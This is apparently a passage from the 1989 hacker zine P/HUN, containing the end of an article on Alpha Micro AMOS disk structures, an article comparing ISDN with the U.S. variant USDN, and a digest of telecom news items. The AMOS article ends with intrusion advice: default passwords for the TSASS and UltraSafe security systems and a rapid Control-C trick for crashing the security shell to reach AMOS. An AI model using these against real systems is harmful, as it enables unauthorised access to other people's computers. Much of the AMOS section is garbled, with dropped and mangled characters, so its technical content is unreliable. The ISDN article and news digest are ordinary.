| File block #1 | File block #2 | File block #3 | File block #4 |

*---------------*---------------*---------------*---------------*



One a random file is allocated on the disk, it is not possible to expand it.

Random files are used mainly for applications where the file length remains

constant.





The first block on a disk (block 0) is the disk ID block. Alpha Micros use

this disk block to maintain permanent identification information about the

disk. The next block (block 1) is the Master File Directory (MFD). At

block 2 lies the disk bitmap. The bitmap is the structure that keeps track

of which blocks on the disk are in use, and which are available. The

bitmap contains one bit for each block on the disk. If a block is in use,

the bit in the bitmap that represents that disk block is a 1; if the block

is available for use, its bit in the bitmap is a 0. The bitmap is perma-

nently stored on the disk beginning with block 2 and extending as far as

necessary. The last two words in te bitmap form a hash total. If some

data in the bitmap becomes destroyed, then there is a chance that data

corruption has occurred. The ocre for writing data to the disk is:



[1] Find in memory a copy of the bitp of the disk to be accessedd.

[2] Computer the hash total of the bitmap & check agains the sh.

[3] Consult bitmap to see the next free block.

[4] Change bitmap to shockthe block is in use.

[5] Recompute bitmap hash to reflect the modified bmap.

[6] Write modified bitmap back out to the disk.

[7] Write thata to the chosen block.



Every disk contains one Master File Directory (MF Each disk contains

one MFD. The MFD is one block long, and contains e entry of four words

for each user account allocated on that disk. This ps the limitation

of having a maximum of 63 user accounts per disk.



Each try in the MFD identifies a specific acct directory. Individual

account dectories are known as User File Directories (UFDs). The entry

contains thccount PPN, number of the first block used by the UFD, and

a password assned (if any). The MFD contains one entry for every UFD

on the disk.One UFD exists for each user account; it contains one entry

for eachlein that account. These contain various sorts of information

relating tthe file. A UFD may consist of more than one disk block; if

it is larger than oblock, the first word of the FD is nzero and gives the link

to the next UFD bock.



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Since the existing security the Alpha Micro is lax, third party

comiehave wriiten their own sceurity systems, making it considerably

more dicult to access a system. However, all is not lost. There are a

few wato make things easier.



Default passwords are the first step. One of the security systems, known

as TSASS, has the default passwords of MAL, MAL, MAL for its prompts. You

will know that you've encounted an Alpha Micro running TSASS by the

message: "Welcome to a Time Shar and Security System". Another security

package, UltraSafe, has the dult PW's of OPR, OPR, OPR. An UltraSafe

system is harder to recognize because the prompts can be changed, although

some more common ones ask for NAME, PORD, and GROUP.



The next option is if you have found a password that lets you in, it may be

one of low security. This can automatically chain you into a menu or shell

program. Depending onw the system is configure, a string of Control C'or any

other key sequence) can mess up the buffer, automatically causing

e curity system to crash, and bringing you to AMOS, without being

confined to the security program. The input must be typed in rapidly, or

it won't work. This method works for both TSASS and UltraSafe.



Note: This file is written for informational purposes oy, to give

you an idea of the workings of computer security for the Al Micro

Operating System (AMOS). If you want more information on the inner workings of

this operating system, then get in touch with me.



Nightcrawler out!

===============================================================================







$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

$ P/HUN Issue #4 $

$ Volume 2: Phile 9 of 11 $

$ $

$ $

$ USDN VERSUS ISDN $

$ ---------------- $

$ $

$ by $

$ $

$ $

$ LORD MICRO $

$ ********** $

$ $

$ TOLL CENTER BBS - (718)-358-9209 $

$ A 2600 MAGAZINE BBS $

$ $

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$





PREFACE: The integrated services digital network (ISDN) is a long-range

plan for systematically upgrading the televommunications networks of various

countries to provide both voice and data services on a single physical network.

European countries have been the major force behind degining ISDN. The U.S.

however, will require a variant of ISDN, because its communications

industry operates in a competitive user-oriented environment. This article

describes the differences in implementation and services that can be expected

with USDN (the U.S. version of ISDN) and identifies unresolved issues that

should concern the data communications manager.



INTRODUCTION

------------



The ISDN proposal has recieved worldwide attention for at least a decade.

Constrained by an apathetic marketplace, technical limitations, economic

considerations, and the slow pace involved in establishing acceptable

world-wide standards, implementation of ISDN has occured principally in

laboratories only.



The International Telegraph and Telephone Consultative Committee (CCITT)

has attempted to define and obtain general consesus regarding ISDN

objectives, interfaces, services, and standards. The CCITT-backed ISDN

principally represents European interests. Although the U.S. is repre-

sented in the CCITT and offers support for its programs, the major

telecommunications organizations in the U.S. are more interested in estab-

lishing their own standards and programs. So, while ISDN seems to be

gaining more U.S. support, it continues to reflect a European perspective.

Recently, the term USDN has been used to distinguish the modifications to

ISDN that are expected to evolve in the U.S. The USDN concept is one of

integrated access to multiple networks, rather than the integrated services

on one network approach of the ISDN proposal.



The U.S. telecommunications industry has long recognized that ISDN would

have a somewhat modified personality in the U.S. Several industry-wide

ISDN conferences addressed the U.S. equivalent to ISDN, but none of the

conference comittees proposed that the U.S. adopt ISDN totally, be-

cause of the unique characteristics of the U.S. communications environment.



THE U.S. COMMUNICATIONS ENVIRONMENT

-----------------------------------



The unique U.S. communications industry characteristics that influence

the USDN effort are described in the following section. These characteristics

are summerized in Table 1, which compares the U.S. communications environment

with the environment in other countries.



The Competitive Marketplace: In the U.S., the privately managed telephone

industry responds, rapidly to user demands for new services. In most other

countries, however, services are established in a slow, deliberate program

by one government-administrated source, usually the country's postal,

telephone, and telegraph (PTT) agency. The users then decide if and how

they will use the services offered.



Technology Advances: Second only to the competitive marketplace, technology

advances include component developments such as as memory devices, VLSI

chip design, and optical elements. Developments in the system architecture,

networking, and functional interfaces in transmission and switching

technologies are equally important in defining the USDN concept.



Less Restrictive National Standards: Because standards imply conformity,

they can restrain innovation. Because they are not required to undergo a

lengthy standards-approval cycle, U.S. manufacturers are free to produce

systems that are incompatible with existing equipment. De facto standards

are often established by the market's acceptance of a particular system.



Comparing ISDN and USDN



FEATURES CLASSICAL ISDN USDN ENVIRONMENT

ENVIRONMENT

-------- -------------- ----------------

Competition Essentially None Varied, encouraged by

government



Standard Inter- CCITT Essentially none

exchange Carriers One, nationalized Many, equal access

Existing Investment Due for replacement Huge, undepreciated

investment



Service Offerings By PTT schedule Entrepreneurial, competitive

Implementation Cost Government-provided funds Private Capital





Multiple Carriers and Competative Networks: The premise of ISDN is that a

common national network will evolve, able to handle multiple voice and data

services in an integrated fashion. ISDN thus precludes a carrier by-passing

a local office or vying for customers' traffic through innovative techniques.

In most countries other than the U.S., telephone companies are not legally

required to provide or counter new service offerings. Integrated digital

networks (IDNs) are emerging in the U.S. that provide digital access and

transmission, in both circuit-switchhed and packet modes. The number of

IDNs will probably increase regardless of whether an ISDN is proposed for

the U.S.



Embedded Investment: The U.S. has invested heavily in modern stored-program

controlled (SPC) switching. However, other countries are only now facing

conversion to SPC, as much of their existing systems investment is

greatly depreciated. These countries can therefore converty to ISDN

switching in a more orderly and economical fashion that the U.S. can. Thus

the U.S. will have overlay networks, digital adjuncts to existing SPC

switches, and multiple networks in the foreseeable future.



EVOLUTION OF U.S. COMMUNICATIONS OFFERINGS

------------------------------------------



The American solutions to data transmission problems have tended to be

faster, more practical, and less elegant than those evolving in Europe.

Not surprisingly, the American solutions have generally ignored CCITT

recommendations. For example, public packet-switched networks such as TYMNET,

GTE Telenet, and Satellite Business Systems are offered to some customers

with long-haul traffic. These systems were severly limited because they

often required access through analog local office. Many major industries

and private organizations thus established their own data networks, often

point to point over leased circuts. Digital Terminating Service was

introduced to provide 56K bit-per-second (up to 448K bit-per-second)

links to the end user over special transmission links. Digital Electronic

Message Service was recently approved to provide 1.5M bit-per-second service

to the end user.

Some suppliers are now offering PBXs with 64K bit-per-second local loops

and direct pulse code-modulated (PCM) trunks to the public network. Two

new standard 1.544M bit-per-second central office-to-PBX interfaces have

been established, the Northern Telecom Computer-to-PBX-interface and

the AT&T Information Systems Digital Multiplexed Interface.



The Development of Local Area Networks: The increasing use of data

terminals and the growth of distributed processing has led to the necessity

of transporting data at rapid rates within a building or local area.

This rapid local data transmission imposed impossible requirements on the

conventional PBX. While PBX designers struggled to upgrade their data

capabilities, computer manufacturers saw the oppertunity to offer local

area networks (LANs) designed specifically to provide wideband data transport

between users in a limited area. Again, expediency and the competitive

climate produced a practical solution - several LANs with different

architectures and protocols. In general, these LANs so not conform to the

ISDN protocol levels identified in the International Standards Organization

(OSI) models. However these LANs cannot be eadily replaced, so the USDN

will have to accommodate them.

A case in point is the apparent conflict between the ISO model of Open

System Interconnection (OSI) and the IBM System Network Architecture (SNA).

The OSI model of a seven-layered architecture for data networks has been

defined for the first four layers only. International agreement on the

remaining protocols will take several more years to obtain, if agreement on

the remaining protocols will take several more years to obtain, if agreement

is possible, Meanwhile, in the U.S., IBM defined a similar protocol, SNA,

and has implemented numerous networks. Long before any ISO standard can be

established, the U.S. will be well populated with SNA systems. The USDN

must be at least compatible with SNA, and SNA could become the national

standard.

Because future PBXs will probably be able to switch synchronous data at

64K bits per second (and multiples therof, up to at least 1.544M bits per

second), there may not be sufficient switched wideband traffic requirements

to support a seperate LAN standard. Long-distance dedicated data services

such as AT&T's ACCUNET and SKYNET are competing for data traffic. In

addition, various data-over-voice (DOV) schemes have been employed over

switched analog circuts. In short, many approaches, services, and facilities

have already been implemented to satisfy the immediate market needs, without

regard to an orderly transition to ISDN. Thus, the USDN will have to

accomodate thesee established services and inteface with most of them.



Introduction of Local Area Data Transports: Recently, electronic (carrier)

serving areas have been replacing long local physical loops. These

subscriber carrier systems provide such data capabilities as DOV and local

area data transport (LADT). LADT offers a packet-switched data capability

that may apply to both business and residential services; its low speed

(up to 4.8K bits per second) and relatively low cost may make it universally

attractive. LADTs may find widespread use for Videotex, meter reading,

power load shedding, security reporting, and marketing transactions.

Although LADT is restricted primarily to a local exchange area, the

evolving USDN will provide transport between LADTs. LADT subscribers will

access the USDN transport carrier through pooled local data concentrators.

A typical LADT Data Subscriber Interface (DSI) unit will concentrate data

from 124 subscribers to a 56K (or 9.6K) bit-per-second trunk to a packet

network. A subscriber can thus dial up a DSI over a conventional voice

loop and transport data through a modem (which may be a part of the

terminal) by means of the switch. A direct access mode is also available

with the subscriber loop terminating on the DSI, permitting independant

simultaneous data and voice transmission. The X.25 link access protocol-

balanced (LAPB) is used, but protocol conversion is restricted in many

instances by federal rules. Although LADTs so not comply with any defined

ISDN service, they are an integral requirement of the USDN.



CSDC Technology: Circut-switched digital capability (CSDC) is another

USDN service that has no ISDN counterpart. CSDC is an alternative voice-

or data-switched circut with end-to-end 56K (or 64K) bit-per-second

transparent connection ensured by dedicated trunk groups in each

switching location. CSDC facilitates large, continuous, bulk data trans-

fers, and its implementation requires added investment in each switch

location as special terminal equipment. CSDC represents yet another

expediant toward providing ISDN-like services while using existing investment.

CSDC technology can also accomodate a full ISDN, if one ever evolves in the

U.S.



Digital Subscriber Loops: ISDN-compatible digital subscriber loops (two

voice, plus one data channel at 144K bits per second) are recieving attention

in the U.S., but the commercial implementation of this technology is not

prograssing rapidly. Near-term subscriber loops will probably acquire data

capability by data ober analog voice multiplexing. Although this step

would not precluse the eventual inclusion of ISDN loops, it would tend to

slow their introduction and widespread acceptance.



Interfaces and Protocols: Although the ISDN revolves around the 30 channel

PCM transmission format used in Europe, it does provide for the 24 channel-

based systems used in the U.S. However, U.S. systems have many unique

interface requirements. A new set of proposed services will require

forwarding of the calling number for control or processing by either the

terminating switching system or the called subcriber. Exchange of such

information will likely be accomplished over a local area common channel

signaling system or a fulll CCITT standard, signaling system #7 network.

Direct data exchange between a network switching unit and a sata bank

and/or processor facility will probably evolve from the current trunking

scheme to a direct signaling carrier, perhaps CCITT standard #7 with OSI

and/or SA protocols.

Calls to cellular mobile roamers (i.e., mobile units that have traveled

outside their base area) will probably be routed to a central data base for

locating routes. A personal locator service for automatically routing calls

to the unit's temporary location will require unique system interface and

protocols. Privately owned transaction networks may provide this unique

interface. While the objective is to eventually use CCITT standard #7 as a

vehicle and X.25 as an interface protocol, the USDN must embrace a wide

assortment of formats, protocols, and interfaces for the near future.



TRANSMISSION TECHNOLOGY TRENDS



Ultimately, subscriber loops in the U.S. will be digital, providing two

64K bit-per-second voice or data channels (i.e.,two B channels) and one 16K

bit-per-second voice or data channels (i.e., two B channels) and one 16K

bit-per-second data only (i.e., one D channel). The 16K bit-per-second

channel will probably permit an 8K bit-per-second user data channel or

submultiplexed channels of a lower bit rate. Full-duplex (i.e., four wire)

operation will be provided by echo-canceling techniques over existing

two-wire loops. An althrnarive approach of time-domain multiplexing may

also be used, especially in the neat term.





Local Loops: Although modems will not be required at either end of the

local loop, network terminating equipment will be required to serve as the

multiplexor and, perhaps, as voice CODECs. Users of such circuts can have

full, simultaneous, reall-time voice and data channels, as well as seperate

control, metering, and low-speed data transmission. With advanced

switching centers, each circut can be routed and billed independently.

Existing 56K bit-per-second channels on conventional 24-channel digital

carrier systems will be replaced by or supplemented with 64K bit-per-second

clear channels with extended framing.

The local loop plant in many areas is already migrating toward carrier-

serving areas, implemented by a subscriber carrier capable of digital

transmission. Some local telephone companies are installing glass fiber in

their local plants in preparation for the downward migration of direct

digital transmission. However, until full, ISDN-type local loops are

universally available, near-term adaptations will be offered to satisfy

market needs and to prevent users from seeking other communications

facilities.



Wideband Circuts: Wideband circuits (i.e., multiples of 64K bits per

second) over the public switched network may become feasible as newer

switching elements are used. Although some transmission links may soon

be able to combine DS-O channels for real-time wideband service, limitations

in switching centers will restrict their general use. Seperate wideband

switching modules, multiplexing on CATV, or extension of wideband LANs may

ultimately appear if the need for wideband transmission remains strong.



Packet Transmission: Packet transmission is an inherent element of the

ISDN. However, the USDN must handle separate packet networks, separate

facilities, separate routing, and even sCparLte roviders. It is unlikely

that American packet networks in the U.S. will ever be combined into an

integrated, single-network ISDN. Therefore, the USDN must accommodate such

overlay networks and the associated problems of routing, protocol conver-

sion, circuit maintenance, billing, and network management. American users

will demand and recieve more options for data transport, data processing,

and support services than any single network is likely to provide.



SWITCHING TECHNOLOGY TRENDS



Implementing ISDN standards on the switching systems already in place

throughoout the U.S. is a formidable task. Most local end offices have

been replaced by SPC analog switches within the past decade. More recently,

SPC digital switches have been installed, and this trend will probably

accelerate through the 1990s. However, these newer switches are third-

generation design; that is, they are designed primarily to handle conventional

voice circuit switched traffic within a hierarchical network. These switches

are not optimized for data handling, multiple networks, or sophisticated user

needs. Although hardware retrofits and software patches are being applied to

accommodate LADT, CSDC, and digital loops, such solutions result in limited

user services, higher costs, and more complex maintenance requirements.



Fourth-Generation Switching: Fourth-generation switching systems, design-

ed for USDN requirements, are beginning to appear. A fourth-generation

switch is optimized for data; voice switching is simply a special case of

data transmission at speeds of 64K bits per second, 32K bits per second,

or any other evolutionary compressed voice bit rate. Fourth-generation

switches do not have central processors. Each functional unit (e.g., lines

or trunks) contains its own processing hardware and software to output

packet-format messages (i.e., containing a header message and a data byte)

in a uniform deferred format. (The data byte may be a digitized voice sample.)

These packets then are routed through a central matrix, which also contains

sufficient processing power to route packets to their interim or final

destination with only the data contained in the header bits of the call

itself.

Services such as route translation, tone reception, billing recording, and

termination functions are inserted into a call in progress by routing the

call packets to specific functional modules on demand. The modules perform

the required call functions and return the packetsto the matrix. (or interal

network). When the required call-handling functions have been sequentially

accomplished, the call is terminated to the desired port and a virtual

circuit is established between the calller and called terminals. During

the call, the packet header provides control and supervision and performs

routine maintenance and alarms.

A fourth-generation switch performs required functions-Centrex attendants,

toll operators, common-channel signaling, or LAN termination-when the

appropriate module is simply plugged in. These functions do not affect

existing system service or capacity. Ideally suited to the USDN, the fully

distributed control architecture of a true forth-generation switch

could also meet the longer-range objectives of the ISDN.

Because they do not require a large, costly central processor complex,

fourth-generation switches can be economically applied as add-on units or

adjuncts to existing SPC switches. Fourth-generation switches thus provide

advanced capabilities without the necessity of replacing or retrofitting

the existing switches. Some features that can be provided as adjuncts

are described in the following paragraphs.



Special Services: In the U.S., services that require more sophisticated

transmission that provided by standard telephone lines are expanding rapidly.

By the end of the 1980s, 50 percent of all lines may require some special

treatment. A USDN switch, or a special service adjunct can provide univer-

sal line circuits that can be remotely administered for transmission

balance, type of transmission, routing, and signaling. The special service

adjunct can provide various voice and data arrangements and automatic

facilities testing as well as provide and maintain sophisticated data and

voice services, often without changing the user's original telephone number.



Business Services: Integrated toll, local, Centrex, PBX, and instrument/

terminal systems are not provided in the U.S. because of its regulatory

climate. Regulations controlling enhanced services, authority to provide

services, equal-access provisions, and franchising of special carriers and

servers all affect the USDN but are constraints in the ISDN plans. Because

of the uncertainty and ambiguity in such regulatory matters, the business

services adjunct can be used with less economic risk than replacing or

retrofitting existing switching systems would incur. The business services

adjunct permits the existing local office to continue providing the local

telephone service for which it was optimized. The business services

adjunct can also economically provide such features as:

* Citywide, Centrex-like service with universal numbering among user

locations.

* Centralized attendants and night service

* Direct data lines at 64K bits per second

* Rerouting of existing PBX trunks with improvement in features

* Lan termination for PBX-to-Lan connections and LAN-to-LAN bridging.





=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



P/HUN Issue #4, Volume 2: Phile 10 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

__________________________________

| |

| P/HUN Telecom News/Advancements |

| PART 1 |

| By DareDevil |

|__________________________________|







Feb. 17-19, 1989

SATELLITE USE WILL KEEP SOARING:



Satellites and fiber-optic cables will be used for

international communications well into the 21st century, according

to a Communications Satellite Corp. study. The study suggests that

services using satellite systems could be up to 45% less expensive

than international transmissions that use fiber. Also giving

satellites staying power: Ability to reach remote areas.



RCI SENDS CALLS OVER THE WATER:

RCI Long Distance, a subsidiary of Rochester Telephone, said

Thursday that it has added 122 countries to its international

service, including popular calling areas such as West Germany and

Israel. Rates: RCI says only that the service will be priced

competitively with other carriers offering international services.



PROGRAM PUTS NETWORK ON THE MAP:

A computer program from Connections Telecommunications can be

used by network designers to create a visual map of their

wide-area network, reports Computerworld magazine. The program,

called Mapconnect, will superimpose over a map of the USA the

serving office, hubbing point and area sites with their

connections. Cost: $2,000 per copy, plus $400 annual maintenance

after the first year.



CALIFORNIA, MORE FIRMS COMPETE:

Competition for local access and transport area data

transmissions to long distance carriers has been strengthened in

California by a recent PUC decision. The commission approved a

deregulation plan that will likely have MCI, US Sprint and Cable

and Wireless Management Services competing with Pacific Bell and

GTE California, says CommunicationsWeek.



VERMONT TO UPGRADE TELE SYSTEM:

The State of Vermont will be getting technical support for

improvements in its telecommunications network from Federal

Engineering Inc., according to CommunicationsWeek. Contract value:

Not revealed. Federal Engineering has provided similar service in

Montana, New Mexico, North Dakota, Virginia and Wyoming.



CAMPUS GETS BIG DOSE OF HI-TECH:

Southwestern Bell is putting more than 40 miles of high-speed

fiber optics into the St. Louis Community College system, reports

CommunicationsWeek. The network will link the school's 3 campuses

and headquarters to provide video, voice and data transmissions

for educational programs. Cost to the school: $580,000, plus

$2,000 per month to use the system.



SOMEONE MIGHT BE LISTENING:

About 30 hours worth of recorded audio-visual material was

recorded by New York City residents recently for transmission into

outer space, reports InfoText magazine. AT&T set up the free

service at its headquarters. Messages were beamed into space on

the company's satellite dishes. Among the messages: A young

student reported on a pro basketball game for any interested

"aliens."



-------------------------------------------------------------------------------

Feb. 20, 1989

AT&T PLANS OVERHAUL:

AT&T announced a sweeping overhaul Friday designed to make the

long-distance company more competitive and profitable. AT&T will

split its 5 business groups into 12 units to 25 units that each

will have sole responsibility for a product or service. The idea

will be phased in over a period of months this year. (For more,

see special AT&T package below. From the USA TODAY Money section.)



JAPAN SET FOR JUNGLE LAUNCH:

The first of 2 satellites for the Japan Communications

Satellite Co. lifts off Feb. 28 from a jungle launch pad in French

Guiana. The launch will inaugurate commercial satellite

communications in Japan and be the first of Hughes Communications'

new HS 393 series. The satellite will begin serving the Japanese

islands, including Okinawa, after a 30- to 60-day testing period.



SATELLITE HAS MANY CUSTOMERS:

The JCSAT 1 satellite going into orbit on Feb. 28 will provide

the Japanese islands with various new services. Scheduled to come

off the satellite: Network and cable TV distribution, used-car

auctions, prep school classes, religious programming, automobile

dealer training, a specialized engineering video network. Also: A

business group plans to offer business communications.



BIG SATELLITE WON'T BE THE LAST:

With a deployed height of 10 meters, the Hughes Communications'

satellite being launched by Japan next week will be the largest

Hughes commercial satellite ever launched. It contains 32

transponders, each one capable of transmitting one TV channel, 45

million bits of data per second, or more than 250 telephone

circuits. Japan will launch a second satellite this summer.



SPACE STATION MAKES AUDIO PLANS:

NASA has chosen Harris Corp. audio communications systems for

use on the space station Freedom, scheduled for operations in

1995. CommunicationsWeek says that under a $35 million subcontract

with Boeing Aerospace, Harris will design, develop and produce

systems for onboard use. Special feature: At times when crew

members have their hands busy, a voice recognition capability will

be available.



CHINA SPRINTS FOR THE MICROWAVE:

About 90% of its surplus microwave network has been sold or

dismantled by US Sprint, according to CommunicationsWeek. The old

equipment is being replaced by a fiber network. Most recently, the

People's Republic of China spent about $15 million for 6,000 used

analog microwave radios and 600 parabolic antennas. China plans to

use the equipment on 11 existing microwave networks.



NYNEX BEGINS ANOTHER TEST:

Nynex is providing a digital data-over-voice private-line

access service for Telenet Communications in a New York City field

trial. It is one of 35 basic service elements Nynex specified in

its Open Network Architecture plan for the FCC, reports

CommunicationsWeek. Nynex expects to present 14 other new

offerings before the end of the year.



BOSSES GET MORE RESPONSIBILITY:

The reorganization plan announced by AT&T Friday is the first

major policy move by Robert E. Allen since he took over last April

as chairman. The goal: Get managers to focus more on customers and

on costs by giving them total responsibility for any money they

make or lose. Right now most of that responsibility is held by top

managers at AT&T.



AT&T HOPES FOR BIGGER SALES:

The AT&T move to split its business groups comes at an

opportune time. AT&T is losing market share in the long-distance

phone market to rivals MCI and US Sprint. Also: AT&T's overall

sales growth has been modest over the last several years. Under

the new plan, the presidents of AT&T's 5 operating groups will be

renamed group executives. The new units will operate as

independent businesses.



NEW APPROACH MIGHT START SLOWLY:

Analysts say it will take years to streamline AT&T's

bureaucracy and get managers accustomed to being directly

accountable for the performance of their businesses. AT&T reported

a loss of $1.67 billion on sales of $35.21 billion in 1988.

Earnings were reduced by a net charge of $3.94 billion from

writing off old equipment and accelerating modernization of its

long-distance network.



-------------------------------------------------------------------------------

Feb. 21, 1989

DATA CROSSES MILES WITH SPEED:

Northern Telecom yesterday announced the availability of the

High Speed Data Module, a data connectivity device that is an

addition to the Meridian SL-1 Data Services product line. A

typical application might involve a bank that uses the module to

connect a programming facility with the bank's main data center,

located approximately 400 miles away. Cost: $725.



INMATES TOUCH, SAVE AND LOSE:

Some 15 inmates from local prisons in the Nashville, Tenn.,

area face computer fraud charges after figuring out Touch & Save

long-distance phone customers' user codes. Officials say the

inmates charged more than $2,000 in calls. The inmates gained

access to the codes and sold them for $5 or more to others in the

prison. (From the USA TODAY News section.)



PRODUCTS WILL PROTECT DATA:

CompuServe Inc. has introduced new encryption products for its

public packet data network, Network World reports. The encryption

services let users move data from expensive leased lines to

cost-effective dial-up public circuits, while protecting the data

from unauthorized access. The cost ranges from $1,495 to $8,100.



PROTEON UNVEILS FIBER MODEM:

Proteon Inc. has developed a single-mode, fiber-optic modem

that will extend the distance between 2 nodes on a token-ring

network, says Network World. The p3282 modem permits 2 nodes to

communicate over a maximum distance of 30 kilometers without using

a repeater. The fiber also uses optical laser technology instead

of LEDs for transmission of the signal. Cost: $10,000.



NETWORK CHARGES ARE DROPPED:

Transettlements Inc. has stopped making additional charges for

internetwork transmission, reports Computerworld magazine. The

firm will no longer charge its users fees, penalties or premiums

for interconnection with other value-added networks. The charge

for going through 2 networks will be the same for going through

only Transettlement's network.



AIRLINES, HOTELS JOIN NETWORK:

GEnie, a consumer online information service from GE

Information Services, is now offering the Official Airline Guide

Electronic Edition Travel Service. The edition will permit GEnie

subscribers to view airline schedules, fares and hotel

information. Cost: A surcharge on GEnie of 17 cents/minute during

non-prime hours and a surcharge of 47 cents/minute during prime

time.



RESERVATIONS ARE A TOUCH AWAY:

Harrah's Reno introduced a guest service center at the Reno

Airport yesterday that uses interactive, live video to streamline

guest reservations. Guests can check into Harrah's, make dinner

reservations and arrange to see a show by touching a TV screen.

The system uses Nevada Bell's new ISDN network that allows voice,

data and video communications to use fiber optic wires

simultaneously.



-------------------------------------------------------------------------------

Feb. 22, 1989

PHONE USERS DO IT THEMSELVES:

US West's 35,000 Bellingham, Wash., customers will test the

first of what could be a major telephone innovation:

Instantaneous, do-it-yourself phone service. In the plan, a person

could shut off service, have a 3-way holiday conversation and have

calls sent to work - all by dialing a series of numbers. (For

more, see special Phones package below.)



SATELLITE TO SERVE INDONESIA:

Scientific-Atlanta has been selected to supply a half dozen

major communication systems in the Pacific Rim: A VSAT satellite

link for Indonesia and 5 private television networks for Japanese

firms. The satellite network will provide interactive data, video

and voice communications to as many as 4,000 sites on the 13,677

islands that make up the Republic of Indonesia.



NETWORKS TO GO ON NEW SATELLITE:

Nippon Telephone & Telegraph Co. of Tokyo and 4 other Japanese

companies said yesterday they will use Scientific-Atlanta's B-MAC

satellite technology to establish 5 private business television

networks in Japan. When their private television networks are

completed, Nippon, Nikken, Telecom Sat and Video Sat plan to send

video signals to JC-Sat, Japan's new communications satellite.



TELCO ENTRY IS UNPREDICTABLE:

Congress will probably not address the issue of telephone

companies entering the TV business in the near future, National

Assn. of Broadcasters President Eddie Fritts tells Broadcasting

magazine. He says the telco entry will be one of the top issues of

the 1990s. But he stops short of making predictions, saying only

that free over-the-air broadcasting will survive.



MORE STATIONS PICK UP SATELLITE:

Satellite-delivered talk-radio programs are growing as AM

station directors look more closely at the potential of

low-maintenance, national talk shows. Broadcasting magazine says

the 3 month-old American Radio Networks joined the field with 22

affiliates and now has 110 stations receiving its 24-hour

satellite service.



SATELLITES FLY FOR GERMAN TV:

Highly competitive satellite and cable TV services are expected

to grow significantly during the next 2 years in West Germany,

according to Broadcasting magazine. West German private TV channel

RTL Plus, a satellite-to-cable service, is expected to expand its

market to 10 million viewers. U.S. firm Capital Cities/ABC has a

holding in Tele-Munchen, part owner of the Tele5 satellite

channel.



SPECIAL PACKAGE ON PHONES:

-------------------------

SERVICE COULD START IN A SNAP:

Customers moving into new homes could start phone service

within minutes by dialing telephone responses to a series of

computer-voiced questions with a new service being tested by US

West Communications. Officials liken the change to the switch from

operator-assisted to direct-dial local calls in the 1920s or the

similar change in long-distance calls in the 1950s.



SERVICE COULD LINE THE WEST:

If an upcoming test of do-it-yourself phone service works in

Bellingham, Wash., another 2-year test will be done on the same

service in a larger market, such as Denver. If that also goes

well, the entire US West market - 14 states - will get the new

system by the year 2000. Throughout the test, all customers still

will be able to use their telephones as they now do.



FEATURES ARE A BUTTON AWAY:

US West customers with do-it-yourself service will be able to

start or stop telephone feature services at any time, including

such commonly used services as call forwarding and 3-telephone

conversations. These services already are available, but only by

calling US West sales representatives during daytime business

hours. The new system will allow changes to be made at any time.



-------------------------------------------------------------------------------

Feb. 24-26, 1989

CELLULAR SIGNAL GOES FARTHER:

Pacific Telesis has installed antennas at both ends of an

Oakland, Calif.-area tunnel to carry signals from cellular car

telephones, reports Forbes magazine. Also: PacTel is using a solar

cell to power a repeater signal and extend coverage into Laguna

Canyon. Forbes says the developments are indications of coming

improvements in cellular transmissions.



THE AIRWAVES ARE CROWDED:

The main problem for cellular phone users in large metropolitan

areas is the addition of new subscribers to already jammed

cellular systems, reports Forbes magazine. The FCC has allocated

only 437 channels of radio waves to each carrier. To add

customers, systems have been subdividing cells, with each cell

having low-power antennas that operate in limited boundaries.



SENDING COSTS WOULD BE HALVED:

Digital cellular technology could solve the problem of cramped

airwaves for cellular telephone systems, reports Forbes magazine.

With digital, ordinary radio interference is eliminated,

conversations are private, data from laptop computers can be sent

to the office from the road. Also: Digital cellular would cost

about half the transmission price because it's twice as fast.



LOYOLA PLANS FOR ISDN USE:

AT&T recently said that the Definity 75/85 communications

system will be the base for an Integrated Services Digital Network

that will carry voice, data and images for Loyola University.

Computerworld says Loyola is expected to be the first commercial

customer to use Definity. By early next year about 7,000 phones on

the 3 Chicago-area campuses will be on the system.



TELENET LINKS WITH STRATACOM:

Telenet Communications has made an agreement with Stratacom

Inc. to develop the technology for what the companies said will be

the first broadband Integrated Services Digital Network service to

be based on the ISDN frame relay interface, reports Computerworld.

Telenet, a subsidiary of U.S. Sprint, will integrate packet

switches with Stratacom digital multiplexers.



THE PHONE IS IN THE BANK:

Banks are playing it smart with their money and are winning

price concessions from telephone companies by pitting carriers

against one another, reports Network World. Some banks are

negotiating for new services; others are cutting costs by striking

custom contracts with local carriers. Example: Irving Trust of New

York used MCI and AT&T to get a new international calling service.



CIA HELP IS NO SECRET:

The CIA linked its electronic-mail systems together with the

help of Soft-Switch, a company in Wayne, Pa., that specializes in

connecting multivendor E-mail systems, reports Government Computer

News. A key function of the software package: Directory services

that maintain information on all mail systems directly or

indirectly connected to the software.



FCC GETS COMPLAINT ON PACBELL:

Conference-Call USA, based in Chicago, has filed a complaint

with the FCC, accusing Pacific Bell of refusing to change its

practice of automatically routing all conference-call traffic to

AT&T, reports CommunicationsWeek. The firm says the practice is

stunting the growth of competitive companies.



STUDENTS ARE ON THE PHONE:

School children in Denver are using computers and transmission

facilities from US West Advanced Technologies to communicate with

teachers, special subject experts and other students.

CommunicationsWeek says the equipment will be given to the school

system at the end of the school year. US West is using information

gained from the trial to plan an information gateway in Omaha,

Neb.



HEARING IMPAIRED CAN MAKE CALLS:

The State Relay Center is scheduled to begin service Friday in

Birmingham, Ala. The new relay center was created to link

hearing-impaired customers by teletype to people they want to

call. The service is funded by a small surcharge on all phone

bills in the state.



-------------------------------------------------------------------------------

Feb. 28, 1989

CALLERS MUST BE TOLD THE COST:

The FCC yesterday ordered 5 companies that charge customers 20%

to 80% more than AT&T, MCI or Sprint to toe the line. The

alternative operators must now tell callers how much the call will

cost and which company is placing it before it goes through. The

high rates usually are placed on hotel, airport or hospital

phones. (From the USA TODAY News section.)



FIRMS GIVE A PART OF REVENUES:

The phone companies told by the FCC yesterday to reveal costs:

Central Corp., International Telecharge Inc., National Telephone

Services Inc., Payline Systems Inc. and Telesphere Network Inc.

Right now all these companies buy phone time from a major carrier

such as AT&T and MCI and then give the hotel, airport or hospital

that uses the service a cut of revenues from every call.



